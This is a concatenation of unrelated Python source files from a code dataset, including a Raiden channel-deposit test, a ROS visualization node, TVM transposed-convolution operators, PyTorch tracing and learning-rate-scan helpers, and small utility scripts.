        partner_address=api2.address,
        total_deposit=deposit,
    )

    # let's make sure it's idempotent. Same total deposit should raise DepositMismatch
    with pytest.raises(DepositMismatch):
        api1.set_total_channel_deposit(registry_address, token_address, api2.address, deposit)

    channel12 = get_channelstate(node1, node2, token_network_address)

    assert channel.get_status(channel12) == ChannelState.STATE_OPENED
    assert channel.get_balance(channel12.our_state, channel12.partner_state) == deposit
    assert channel12.our_state.contract_balance == deposit
    assert api1.get_channel_list(registry_address, token_address, api2.address) == [channel12]

    # there is a channel open, they must be healthchecking each other
    assert api1.get_node_network_state(api2.address) == NetworkState.REACHABLE
    assert api2.get_node_network_state(api1.address) == NetworkState.REACHABLE

    event_list2 = api1.get_blockchain_events_channel(
        token_address, channel12.partner_state.address
    )
    assert must_have_event(
        event_list2,
        {
            "event": ChannelEvent.DEPOSIT,
            "args": {"participant": to_checksum_address(api1.address), "total_deposit": deposit},
        },
    )

    api1.channel_close(registry_address, token_address, api2.address)

    # Load the new state with the channel closed
    channel12 = get_channelstate(node1, node2, token_network_address)

    event_list3 = api1.get_blockchain_events_channel(
        token_address, channel12.partner_state.address
    )
    assert len(event_list3) > len(event_list2)
    assert must_have_event(
        event_list3,
        {
            "event": ChannelEvent.CLOSED,
            "args": {"closing_participant": to_checksum_address(api1.address)},
        },
    )
    assert channel.get_status(channel12) == ChannelState.STATE_CLOSED

    # Deposits into a closed channel must be rejected
    with pytest.raises(UnexpectedChannelState):
        api1.set_total_channel_deposit(
            registry_address, token_address, api2.address, deposit + 100
        )

    # Wait for the on-chain settlement to be reflected in the node's state
    assert wait_for_state_change(
        node1.raiden,
        ContractReceiveChannelSettled,
        {
            "canonical_identifier": {
                "token_network_address": token_network_address,
                "channel_identifier": channel12.identifier,
            }
        },
        retry_timeout,
    )
| StarcoderdataPython |
6531316 | <gh_stars>1-10
"""The __init__.py for 'routes' which contains the only permit for functions' sharing.
"""
from .base import setup_routes
# Admitting permit for usage in other modules to the setup_routes only.
__all__ = ('setup_routes',) | StarcoderdataPython |
4979937 | # Author: <NAME>
# Date : 2022/03/28
"""Package containing jinja templates used by mdev.project."""
| StarcoderdataPython |
#!/usr/bin/python
# author luke
#
# Regex demo script.  Fixes over the original: all patterns are raw strings
# (plain strings containing "\w" / "\d" are invalid escape sequences and a
# SyntaxWarning on modern Python), and the duplicate ``import re`` is removed.
import re

# [A-Z][a-z]* : one uppercase letter followed by zero or more lowercase ones.
ret = re.match(r"[A-Z][a-z]*", "MM")
print(ret.group())  # "M" -- the second uppercase "M" is not consumed
ret = re.match(r"[A-Z][a-z]*", "MnnM")
print(ret.group())  # "Mnn"
ret = re.match(r"[A-Z][a-z]*", "Aabcdef")
print(ret.group())  # "Aabcdef"
print('-'*50)
# 需求:匹配出,变量名是否有效
# A valid identifier starts with a letter or underscore, then word chars.
names = ["name1", "_name", "2_name", "__name__"]
for name in names:
    ret = re.match(r"[a-zA-Z_]+[\w]*", name)
    if ret:
        print("变量名 %s 符合要求" % ret.group())
    else:
        print("变量名 %s 非法" % name)
print('-'*50)
# 需求:匹配出,0到99之间的数字
ret = re.match(r"[1-9]?[0-9]", "7")
print(ret.group())
ret = re.match(r"[1-9]?\d", "33")
print(ret.group())
# 匹配0-99,不要01和09 -- the trailing $ rejects strings such as "09".
ret = re.match(r"[1-9]?\d$", "9")
print(ret.group())
print('-'*50)
# 匹配m个字符 -- exactly 6 word characters.
ret = re.match(r"[a-zA-Z0-9_]{6}", "12a3g45678")
print(ret.group())
# Between 8 and 20 word characters (greedy, so 20 are taken here).
ret = re.match(r"[a-zA-Z0-9_]{8,20}", "1ad12f23s34455ff6677777777")
print(ret.group())
3241869 | #!/usr/bin/env python2
from __future__ import print_function
import roslib
import sys
import rospy
import numpy as np
import datetime
import time
from geometry_msgs.msg import PoseArray
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseWithCovariance
from nav_msgs.msg import Odometry
from dse_msgs.msg import PoseMarkers
from std_msgs.msg import Float64MultiArray
from std_msgs.msg import MultiArrayLayout
from std_msgs.msg import MultiArrayDimension
from dse_msgs.msg import InfFilterResults
from visualization_msgs.msg import Marker
from scipy.spatial.transform import Rotation as R
from gazebo_msgs.msg import LinkStates
import tf_conversions
import tf2_ros
import dse_lib
import dse_constants
roslib.load_manifest('dse_simulation')
class information_filter:
    """ROS node helper that republishes DSE measurements and information
    filter results as visualization-friendly messages.

    Subscribes to this agent's pose-marker measurements and information
    filter results, and republishes them as PoseArray / Odometry messages
    under ``<prefix>/dse/vis/...`` topics.
    """

    # Define initial/setup values
    def __init__(self):
        # Get parameters from launch file
        self.ros_prefix = rospy.get_param('~prefix')
        # Normalize the prefix so a non-empty prefix always starts with '/'.
        if len(self.ros_prefix) != 0 and self.ros_prefix[0] != '/':
            self.ros_prefix = '/' + self.ros_prefix
        # TF frame prefix is the ROS prefix without its leading '/'.
        # NOTE(review): "pretix" looks like a typo for "prefix"; kept because
        # the rest of this class references the same attribute name.
        self.tf_pretix = self.ros_prefix[1:]
        self.this_agent_id = rospy.get_param('~id')
        self.dim_state = rospy.get_param('~dim_state')
        # self.ros_prefix = '/tb3_0'
        # self.tf_pretix = self.ros_prefix[1:]
        # self.this_agent_id = 5
        # self.dim_state = 6
        self.camera_pose_sub = rospy.Subscriber(self.ros_prefix + "/dse/pose_markers", PoseMarkers, self.measurement_callback)
        self.inf_results_sub = rospy.Subscriber(self.ros_prefix + "/dse/inf/results", InfFilterResults, self.results_callback)
        self.meas_vis_pub = rospy.Publisher(self.ros_prefix + "/dse/vis/measurement", PoseArray, queue_size=10)
        # One Odometry publisher is created lazily per estimated agent id
        # (see results_callback); these two lists stay index-aligned.
        self.est_ids = []
        self.est_vis_pubs = []#rospy.Publisher(self.ros_prefix + "/dse/vis/estimates", PoseArray, queue_size=10)
        # Observation dimensionality is tied to the state dimensionality:
        # 6-state -> 3-D observations, 12-state -> 6-D observations.
        if self.dim_state == 6:
            self.dim_obs = 3
        elif self.dim_state == 12:
            self.dim_obs = 6
        else:
            rospy.signal_shutdown('invalid state dimension passed in')
        # Define static variables
        self.dt = 0.1
        self.t_last = rospy.get_time()
        self.gzbo_ref_obj_state = None
        self.pthn_ref_obj_state = None

    # Create pose_array for measurement data
    def measurement_callback(self, data):
        """Republish measured poses as one PoseArray in the odom frame."""
        poses = PoseArray()
        for pose_stamped in data.pose_array:
            poses.poses += [pose_stamped.pose.pose]
        poses.header.stamp = rospy.Time.now()
        # Frame is '<tf_prefix>/odom', or plain 'odom' with no prefix.
        if self.ros_prefix == '':
            poses.header.frame_id = 'odom'
        else:
            poses.header.frame_id = self.tf_pretix + '/odom'
        self.meas_vis_pub.publish(poses)

    # Create pose_array for the information results
    def results_callback(self, data):
        """Convert information-filter results (Y, y) to per-agent Odometry
        messages with covariance, publishing one per tracked agent id."""
        inf_id_list = np.array(data.ids)
        inf_Y = dse_lib.multi_array_2d_output(data.inf_matrix)
        inf_y = dse_lib.multi_array_2d_output(data.inf_vector)
        # Information form to moment form: x = Y^-1 * y, P = Y^-1.
        self.inf_x = np.linalg.inv(inf_Y).dot(inf_y)
        inf_P = np.linalg.inv(inf_Y)
        # Clamp negatives then take an element-wise sqrt.
        # NOTE(review): this is an element-wise sqrt, not a matrix square
        # root of the covariance -- confirm this is intended.
        inf_P[inf_P < 0] = 0
        inf_P = np.sqrt(inf_P)
        odom = Odometry()
        odom.header.stamp = rospy.Time.now()
        odom.header.frame_id = self.tf_pretix + '/odom'
        # if self.ros_prefix == '':
        #     odom.header.frame_id = 'base_footprint'
        # else:
        #     odom.header.frame_id = self.tf_pretix + '/base_footprint'
        # Create a publisher for any agent id we have not seen before.
        for id in inf_id_list:
            if id not in self.est_ids:
                self.est_ids.append(id)
                self.est_vis_pubs.append(rospy.Publisher(self.ros_prefix + "/dse/vis/estimates/" + str(id), Odometry, queue_size=10))
        # Publish the state slice and covariance block for each agent id.
        for id in inf_id_list:
            i = np.where(inf_id_list == id)[0][0]
            j = self.est_ids.index(id)
            # Each agent occupies a dim_state-long slice of the stacked state.
            i_min = i * self.dim_state
            i_max = i_min + self.dim_state
            odom.pose.pose = dse_lib.pose_from_state_3D(self.inf_x[i_min:i_max])
            cov = dse_lib.sub_matrix(inf_P, inf_id_list, id, self.dim_state)
            cov = dse_lib.state_cov_to_covariance_matrix(cov)
            odom.pose.covariance = list(dse_lib.covariance_to_ros_covariance(cov))
            self.est_vis_pubs[j].publish(odom)
def main(args):
    """Initialize the visualization ROS node and spin until shutdown.

    args : list of str
        Command-line arguments (accepted but unused).
    """
    rospy.init_node('dse_gazebo_visualization_node', anonymous=True)
    # Constructing the node registers all subscribers/publishers.
    imf = information_filter()
    try:
        rospy.spin()
    except KeyboardInterrupt:
        print("Shutting down")


if __name__ == '__main__':
    main(sys.argv)
| StarcoderdataPython |
3483717 | <gh_stars>10-100
class Queue:
    """FIFO queue implemented with two LIFO stacks (Python lists).

    ``q1`` receives pushed elements; ``q2`` holds older elements in reversed
    order so that its top is the queue front.  Elements migrate from ``q1``
    to ``q2`` lazily, only when ``q2`` runs empty, giving amortized O(1)
    push/pop/peek.

    Fixes over the original: the transfer loop no longer drives control flow
    with a bare ``except:`` (which swallowed every exception), the transfer
    logic shared by ``pop`` and ``peek`` is factored into one helper, and
    ``pop`` now returns the removed element (backward compatible -- callers
    that ignored the previous ``None`` return are unaffected).
    """

    # initialize your data structure here.
    def __init__(self):
        self.q1 = []  # incoming stack
        self.q2 = []  # outgoing stack; top (last element) is the queue front

    def _shift(self):
        """Move every element from q1 onto q2, reversing their order.

        Intended to be called only when q2 is empty; afterwards q2's top is
        the oldest element still in the queue.
        """
        while self.q1:
            self.q2.append(self.q1.pop())

    # @param x, an integer
    def push(self, x):
        """Append x to the back of the queue."""
        self.q1.append(x)

    def pop(self):
        """Remove the front element and return it.

        Raises IndexError on an empty queue (same as the original, where
        ``q2.pop()`` on an empty list raised).
        """
        if not self.q2:
            self._shift()
        return self.q2.pop()

    def peek(self):
        """Return the front element without removing it.

        Raises IndexError on an empty queue.
        """
        if not self.q2:
            self._shift()
        return self.q2[-1]

    # @return an boolean
    def empty(self):
        """Return True when the queue holds no elements."""
        return (not self.q1) and (not self.q2)
| StarcoderdataPython |
17040 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-variable, unused-argument
"""Transposed 2D convolution operators (sometimes called Deconvolution)."""
import collections
import tvm
from tvm import relay, te
from ..utils import simplify
from .dilate import dilate
from .pad import pad
from .utils import get_pad_tuple
def _ntuple(n):
def parse(x):
if isinstance(x, collections.abc.Iterable):
assert len(x) == n, f"Input can only have {n} elements, but got {len(x)} instead: {x}."
return x
return tuple(repeat(x, n))
return parse
# Pre-built coercers for the common arities: each accepts either an iterable
# of exactly that length (returned unchanged) or a scalar repeated to length.
_single = _ntuple(1)
_pair = _ntuple(2)
_triple = _ntuple(3)
_quadruple = _ntuple(4)
def conv2d_transpose_nchw(Input, Filter, strides, padding, out_dtype, output_padding):
    """Transposed 2D convolution nchw forward operator.

    Parameters
    ----------
    Input : tvm.te.Tensor
        4-D with shape [batch, in_channel, in_height, in_width]
    Filter : tvm.te.Tensor
        4-D with shape [in_channel, num_filter, filter_height, filter_width]
    strides : tuple of two ints
        The spatial stride along height and width
    padding : int or str
        Padding size, or ['VALID', 'SAME']
    out_dtype : str
        The output data type. This is used for mixed precision.
    output_padding : tuple of ints
        Used to get the right output shape for gradients

    Returns
    -------
    Output : tvm.te.Tensor
        4-D with shape [batch, out_channel, out_height, out_width]
    """
    # Thin wrapper: all of the actual work happens in the shared
    # implementation below.
    return declaration_conv2d_transpose_impl(
        Input,
        Filter,
        strides,
        padding,
        out_dtype,
        output_padding=output_padding,
    )
def conv2d_transpose_nchw_preprocess(data, kernel, strides, padding, out_dtype, output_padding):
    """Preprocess data and kernel to make the compute pattern
    of conv2d_transpose the same as conv2d.

    Dilates and pads the input so that a plain stride-1 convolution with the
    flipped kernel computes the transposed convolution.  Returns the padded
    data and the transformed (OIHW, 180-degree-rotated) kernel.
    """
    batch, in_c, in_h, in_w = data.shape
    _, out_c, filter_h, filter_w = kernel.shape
    stride_h, stride_w = strides
    opad_h, opad_w = output_padding
    # Output padding must be strictly smaller than the stride.
    assert opad_h < stride_h and opad_w < stride_w
    # dilate data: insert (stride - 1) zeros between adjacent input elements
    data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
    # pad data: back-padding is the complement of the forward-conv padding,
    # extended by the requested output padding on the bottom/right.
    fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
    bpad_top = filter_h - 1 - fpad_top
    bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
    bpad_left = filter_w - 1 - fpad_left
    bpad_right = filter_w - 1 - fpad_right + opad_w
    data_pad = pad(
        data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
    )
    # transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
    kernel_transform = te.compute(
        (out_c, in_c, filter_h, filter_w),
        lambda o, i, h, w: kernel[i][o][filter_h - 1 - h][filter_w - 1 - w],
        name="kernel_transform",
    )
    return data_pad, kernel_transform
def declaration_conv2d_transpose_impl(data, kernel, strides, padding, out_dtype, output_padding):
    """Implementation of conv2d transpose.

    Parameters mirror :func:`conv2d_transpose_nchw`.  The transposed
    convolution is realized as a stride-1 convolution over the dilated,
    padded input using the flipped kernel produced by the preprocess step.
    """
    data_pad, kernel_transform = conv2d_transpose_nchw_preprocess(
        data, kernel, strides, padding, out_dtype, output_padding
    )
    batch, in_c, in_h, in_w = data_pad.shape
    out_c, _, filter_h, filter_w = kernel_transform.shape
    # convolution stage
    out_c = simplify(out_c)
    # Output size of a stride-1 "VALID" convolution over the padded input.
    out_h = simplify(in_h - filter_h + 1)
    out_w = simplify(in_w - filter_w + 1)
    # Reduction axes: input channel and the two kernel spatial dimensions.
    dc = te.reduce_axis((0, in_c), name="dc")
    dh = te.reduce_axis((0, filter_h), name="dh")
    dw = te.reduce_axis((0, filter_w), name="dw")
    Output = te.compute(
        (batch, out_c, out_h, out_w),
        lambda b, c, h, w: te.sum(
            data_pad[b, dc, h + dh, w + dw].astype(out_dtype)
            * kernel_transform[c, dc, dh, dw].astype(out_dtype),
            axis=[dc, dh, dw],
        ),
        tag="conv2d_transpose_nchw",
    )
    return Output
def group_conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding, groups):
    """Group convolution operator in NCHW layout.

    Parameters
    ----------
    data : tvm.te.Tensor
        4-D with shape [batch, in_channel, in_height, in_width]
    kernel : tvm.te.Tensor
        4-D with shape [in_channel, out_channel // groups, filter_height, filter_width]
    stride : int or a list/tuple of two ints
        Stride size, or [stride_height, stride_width]
    padding : int or a list/tuple of 2 or 4 ints
        padding size, or
        [pad_height, pad_width] for 2 ints, or
        [pad_top, pad_left, pad_bottom, pad_right] for 4 ints
    out_dtype : str
        The output data type. This is used for mixed precision.
    output_padding : tuple of ints
        Used to get the right output shape for gradients
    groups : int
        number of groups

    Returns
    -------
    Output : tvm.te.Tensor
        4-D with shape [batch, out_channel, out_height, out_width]
    """
    # Single-group case reduces to the plain transposed convolution.
    if groups == 1:
        return conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding)
    # some pre-processing and prelimnary checks
    if out_dtype is None:
        out_dtype = data.dtype
    batch, in_channels, in_h, in_w = data.shape
    _, out_c, filter_h, filter_w = kernel.shape
    assert (
        in_channels % groups == 0
    ), f"input channels {in_channels} must divide group size {groups}"
    # assert out_c % groups == 0, f"output channels {in_c} must divide group size {groups}"
    strides = _pair(stride)
    # padding = _pair(padding)
    # output_padding = _pair(output_padding)
    # dilation = _pair(dilation)
    stride_h, stride_w = strides
    opad_h, opad_w = output_padding
    assert (
        opad_h < stride_h and opad_w < stride_w
    ), f"[{output_padding}] opad_h:{opad_h} < stride_h:{stride_h} \
        and opad_w:{opad_w} < stride_w:{stride_w} does not satisfy."
    # dilate data: insert (stride - 1) zeros between adjacent input elements
    data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
    # pad data: back-padding complements the forward-conv padding.
    fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
    bpad_top = filter_h - 1 - fpad_top
    bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
    bpad_left = filter_w - 1 - fpad_left
    bpad_right = filter_w - 1 - fpad_right + opad_w
    data_pad = pad(
        data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
    )
    # transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
    # NOTE(review): the lambda's parameter names (i, o) are swapped relative
    # to the single-group path above (which uses ``lambda o, i``); the
    # ``kernel[o][i]`` indexing is consistent with the compute shape, so the
    # math matches -- verify carefully before renaming.
    kernel_transform = te.compute(
        (out_c, in_channels, filter_h, filter_w),
        lambda i, o, h, w: kernel[o][i][filter_h - 1 - h][filter_w - 1 - w],
        name="kernel_transform",
    )
    batch, in_channels, in_h, in_w = data_pad.shape
    out_c, _, filter_h, filter_w = kernel_transform.shape
    # convolution stage
    out_channels = simplify(out_c * groups)
    out_h = simplify(in_h - filter_h + 1)
    out_w = simplify(in_w - filter_w + 1)
    # Reduction runs over the per-group input-channel slice only.
    dc = te.reduce_axis((0, in_channels // groups), name="dc")
    dh = te.reduce_axis((0, filter_h), name="dh")
    dw = te.reduce_axis((0, filter_w), name="dw")
    # data: batch, in_channels, out_h, out_w
    # weight: out_channels // G, in_channels, out_h, out_w
    return te.compute(
        (batch, out_channels, out_h, out_w),
        lambda b, c, h, w: te.sum(
            data_pad[
                b, c // (out_channels // groups) * (in_channels // groups) + dc, h + dh, w + dw
            ].astype(out_dtype)
            * kernel_transform[
                c % (out_channels // groups),
                c // (out_channels // groups) * (in_channels // groups) + dc,
                dh,
                dw,
            ].astype(out_dtype),
            axis=[dc, dh, dw],
        ),
        tag="group_conv2d_transpose_nchw",
    )
def layout_transform(tensor: "relay.Expr", current_layout: str, desired_layout: str):
    """Transform a tensor with the current layout to the desired layout.

    E.g. layout_transform(t, "NCHW", "CNHW") --> relay.transpose(t, [1, 0, 2, 3])

    Parameters
    ----------
    tensor: relay.Expr
        The Tensor to transpose
    current_layout: str
        The current layout e.g. NCHW or OIHW
    desired_layout: str
        The desired layout, must be compatible with current_layout

    Returns
    -------
    The layout_transformed tensor.
    """
    # Layouts are compatible only if they are permutations of each other.
    if sorted(current_layout) != sorted(desired_layout):
        raise ValueError(f"Incompatible layouts: {current_layout} vs {desired_layout}")

    # Identical layouts need no transpose at all.
    if current_layout == desired_layout:
        return tensor

    # For each output axis, look up where that axis lives in the input.
    source_position = {axis: pos for pos, axis in enumerate(current_layout)}
    axes = [source_position[axis] for axis in desired_layout]
    return relay.transpose(tensor, axes=axes)
@tvm.target.generic_func
def conv2d_transpose_legalize(attrs, inputs, types):
    """Legalizes Transposed 2D convolution op.

    Rewrites NHWC-layout transposed convolutions to NCHW (transposing data
    in and out) and normalizes the kernel layout to IOHW in both supported
    cases.  Returns None for any other data layout, meaning "no
    legalization applied".

    Parameters
    ----------
    attrs : tvm.ir.Attrs
        Attributes of current Transposed 2D convolution
    inputs : list of tvm.relay.Expr
        The args of the Relay expr to be legalized
    types : list of types
        List of input and output types

    Returns
    -------
    result : tvm.relay.Expr
        The legalized expr
    """
    data, kernel = inputs
    kernel_layout = attrs["kernel_layout"]
    if attrs["data_layout"] == "NHWC":
        # Bring the kernel to IOHW, run the op in NCHW, transpose back.
        kernel = layout_transform(kernel, kernel_layout, "IOHW")

        # Set new attrs for conv2d_transpose.
        new_attrs = {k: attrs[k] for k in attrs.keys()}
        new_attrs["data_layout"] = "NCHW"
        # layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
        new_attrs["kernel_layout"] = "IOHW"

        # Convert data to NCHW.
        data = relay.transpose(data, axes=(0, 3, 1, 2))
        deconv = relay.nn.conv2d_transpose(data, kernel, **new_attrs)
        # Convert back to original NHWC layout.
        out = relay.transpose(deconv, axes=(0, 2, 3, 1))
        return out

    if attrs["data_layout"] == "NCHW":
        # Data layout already matches; only normalize the kernel layout.
        kernel = layout_transform(kernel, kernel_layout, "IOHW")
        new_attrs = {k: attrs[k] for k in attrs.keys()}

        # layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
        new_attrs["kernel_layout"] = "IOHW"
        return relay.nn.conv2d_transpose(data, kernel, **new_attrs)

    # Unhandled layouts fall through: None signals "no legalization".
    return None
| StarcoderdataPython |
1830329 | <gh_stars>10-100
import os
from openpyxl import load_workbook
entity_database_path = os.path.join("/Users/FabianFalck/Documents/[03]PotiticalCompass_PAPER/SPC/Paper/Code/Data_pipe", "entities_without_duplicates.xlsx")
newspaper_database_path = os.path.join("/Users/FabianFalck/Documents/[03]PotiticalCompass_PAPER/SPC/Paper/Code/Data_pipe", "newspaper_database.xlsx")
def retrieve_entities(only_search_terms):
    """
    Extracts all entities in the worksheet database into a list of strings.

    :param only_search_terms: when True keep only rows whose "search term"
        column (D) equals 1; when False keep only rows where it equals 0.
    :return: tuple ``(entities, importances)`` -- parallel lists of entity
        names (column A, as strings) and importance values (column E).
    """
    wb = load_workbook(filename=entity_database_path)
    sheet = wb['Paper']
    # get all entities in the worksheet
    entity_cells = sheet['A2:A' + str(sheet.max_row)]  # 2, since row 1 is column name
    entities = [str(cell[0].value) for cell in entity_cells]  # strange tuple in tuple
    # get the column search term
    search_term_cells = sheet['D2:D' + str(sheet.max_row)]  # 2, since row 1 is column name
    search_terms = [cell[0].value for cell in search_term_cells]  # strange tuple in tuple
    # get the column importance
    importance_cells = sheet['E2:E' + str(sheet.max_row)]  # 2, since row 1 is column name
    importance_terms = [cell[0].value for cell in importance_cells]  # strange tuple in tuple
    # print(type(search_terms[0]))
    # print(search_terms[0])
    print("before search_terms: ", len(entities))
    # get only those entities that have search_term set to 1
    # (the importances list is filtered with the same mask so the two
    # returned lists stay index-aligned)
    if only_search_terms:
        entities = [entity for i, entity in enumerate(entities) if search_terms[i] == 1]
        importances = [importance for i, importance in enumerate(importance_terms) if search_terms[i] == 1]
    elif not only_search_terms:
        entities = [entity for i, entity in enumerate(entities) if search_terms[i] == 0]
        importances = [importance for i, importance in enumerate(importance_terms) if search_terms[i] == 0]
    print("after search_terms: ", len(entities))
    # print("before unique: ", len(entities))  # TODO deprecated: duplicates removed in excel
    # get only unique entities (only process them once)
    # entities = set(entities)
    # entities = list(entities)
    # print("after unique: ", len(entities))
    print("number of entities as search terms: ", len(entities))  # should be ~ 1050 with all search terms
    print("number of importances as search terms: ", len(importances))
    assert len(entities) == len(importances)
    return entities, importances
def retrieve_newspaper_domains():
    """
    Extracts all newspaper domains in the worksheet database into a list of strings.
    :return: newspaper domains as list of strings
    """
    workbook = load_workbook(filename=newspaper_database_path)
    worksheet = workbook['Sheet1']
    # Column A, skipping the header row (row 1 holds the column name).
    cell_rows = worksheet['A2:A' + str(worksheet.max_row)]
    domains = [str(row[0].value) for row in cell_rows]
    print("number of newspapers: ", len(domains))
    return domains
if __name__ == "__main__":
print(retrieve_entities(only_search_terms=True))
print(retrieve_newspaper_domains()) | StarcoderdataPython |
3506008 | """PyTorch utilities for the UC Irvine course on
'ML & Statistics for Physicists'
"""
import functools
import copy
import numpy as np
import torch.nn
def sizes_as_string(tensors):
    """Render the size of a tensor -- or of a nested collection of
    tensors -- as a human-readable, comma-separated string of tuples."""
    if isinstance(tensors, torch.Tensor):
        return str(tuple(tensors.size()))
    # Recurse over collections so arbitrarily nested structures work.
    return ', '.join(sizes_as_string(T) for T in tensors)
def trace_forward(module, input, output, name='', verbose=False):
    """Implement the module forward hook API.

    Saves detached views of the module's input(s) and output(s) on the
    module itself; single-element tuples are unwrapped to the bare tensor.

    Parameters
    ----------
    input : tuple or tensor
        Input tensor(s) to this module. We save a detached
        view to this module's `input` attribute.
    output : tuple or tensor
        Output tensor(s) to this module. We save a detached
        view to this module's `output` attribute.
    """
    if isinstance(input, tuple):
        # Stored as a list (outputs below use a tuple) -- preserved as-is.
        module.input = [I.detach() for I in input]
        if len(module.input) == 1:
            module.input = module.input[0]
    else:
        module.input = input.detach()
    if isinstance(output, tuple):
        module.output = tuple([O.detach() for O in output])
        if len(module.output) == 1:
            module.output = module.output[0]
    else:
        module.output = output.detach()
    if verbose:
        print(f'{name}: IN {sizes_as_string(module.input)} OUT {sizes_as_string(module.output)}')
def trace_backward(module, grad_in, grad_out, name='', verbose=False):
    """Implement the module backward hook API.

    Parameters
    ----------
    grad_in : tuple or tensor
        Gradient tensor(s) for each input to this module.
        These are the *outputs* from backwards propagation and we
        ignore them.
    grad_out : tuple or tensor
        Gradient tensor(s) for each output to this module.
        These are the *inputs* to backwards propagation and
        we save detached views to the module's `grad` attribute.
        If grad_out is a tuple with only one entry, which is usually
        the case, save the tensor directly.
    """
    if isinstance(grad_out, tuple):
        module.grad = tuple([O.detach() for O in grad_out])
        # Unwrap single-element tuples to the bare tensor.
        if len(module.grad) == 1:
            module.grad = module.grad[0]
    else:
        module.grad = grad_out.detach()
    if verbose:
        print(f'{name}: GRAD {sizes_as_string(module.grad)}')
def trace(module, active=True, verbose=False):
    """Attach (or remove) forward/backward tracing hooks on all submodules.

    With ``active=True``, registers hooks that record each submodule's
    input/output/grad via :func:`trace_forward` / :func:`trace_backward`.
    With ``active=False``, only removes previously registered hooks.
    Hook handles are kept on ``module._trace_hooks`` for later removal.
    """
    if hasattr(module, '_trace_hooks'):
        # Remove all previous tracing hooks.
        for hook in module._trace_hooks:
            hook.remove()
    if not active:
        return

    module._trace_hooks = []
    for name, submodule in module.named_modules():
        # Skip the root module itself; every descendant gets hooked.
        if submodule is module:
            continue
        module._trace_hooks.append(submodule.register_forward_hook(
            functools.partial(trace_forward, name=name, verbose=verbose)))
        module._trace_hooks.append(submodule.register_backward_hook(
            functools.partial(trace_backward, name=name, verbose=verbose)))
def get_lr(self, name='lr'):
    """Return parameter ``name`` from the optimizer's unique parameter
    group that defines it; raise ValueError if zero or several groups do."""
    matching = [group for group in self.param_groups if name in group]
    if not matching:
        raise ValueError(f'Optimizer has no parameter called "{name}".')
    if len(matching) > 1:
        raise ValueError(f'Optimizer has multiple parameters called "{name}".')
    return matching[0][name]
def set_lr(self, value, name='lr'):
    """Set parameter ``name`` to ``value`` in the optimizer's unique
    parameter group that defines it; raise ValueError if zero or several
    groups do."""
    matching = [group for group in self.param_groups if name in group]
    if not matching:
        raise ValueError(f'Optimizer has no parameter called "{name}".')
    if len(matching) > 1:
        raise ValueError(f'Optimizer has multiple parameters called "{name}".')
    matching[0][name] = value
# Add get_lr, set_lr methods to all Optimizer subclasses.
# (Monkey-patching the base class makes the helpers available on every
# torch optimizer instance without subclassing.)
torch.optim.Optimizer.get_lr = get_lr
torch.optim.Optimizer.set_lr = set_lr
def lr_scan(loader, model, loss_fn, optimizer, lr_start=1e-6, lr_stop=1., lr_steps=100):
    """Implement the learning-rate scan described in Smith 2015.

    Runs up to ``lr_steps`` minibatches while the learning rate increases
    geometrically from ``lr_start`` to ``lr_stop``, recording the loss at
    each step.  Restores the model and optimizer state afterwards, plots
    loss vs. learning rate, and sets the optimizer lr to half the value
    that produced the lowest loss.
    """
    import matplotlib.pyplot as plt
    # Save the model and optimizer states before scanning.
    model_save = copy.deepcopy(model.state_dict())
    optim_save = copy.deepcopy(optimizer.state_dict())
    # Schedule learning rate to increase in logarithmic steps.
    lr_schedule = np.logspace(np.log10(lr_start), np.log10(lr_stop), lr_steps)
    model.train()
    losses = []
    scanning = True
    while scanning:
        for x_in, y_tgt in loader:
            # Uses the get_lr/set_lr helpers patched onto Optimizer above.
            optimizer.set_lr(lr_schedule[len(losses)])
            y_pred = model(x_in)
            loss = loss_fn(y_pred, y_tgt)
            # NOTE(review): ``loss.data`` bypasses autograd bookkeeping;
            # ``loss.detach()`` is the modern equivalent.
            losses.append(loss.data)
            # Stop when the step budget is exhausted or the loss has
            # diverged (more than 10x the first recorded loss).
            if len(losses) == lr_steps or losses[-1] > 10 * losses[0]:
                scanning = False
                break
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
    # Restore the model and optimizer state.
    model.load_state_dict(model_save)
    optimizer.load_state_dict(optim_save)
    # Plot the scan results.
    plt.plot(lr_schedule[:len(losses)], losses, '.')
    plt.ylim(0.5 * np.min(losses), 10 * losses[0])
    plt.yscale('log')
    plt.xscale('log')
    plt.xlabel('Learning rate')
    plt.ylabel('Loss')
    # Return an optimizer with set_lr/get_lr methods, and lr set to half of the best value found.
    idx = np.argmin(losses)
    lr_set = 0.5 * lr_schedule[idx]
    print(f'Recommended lr={lr_set:.3g}.')
    optimizer.set_lr(lr_set)
| StarcoderdataPython |
5149884 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
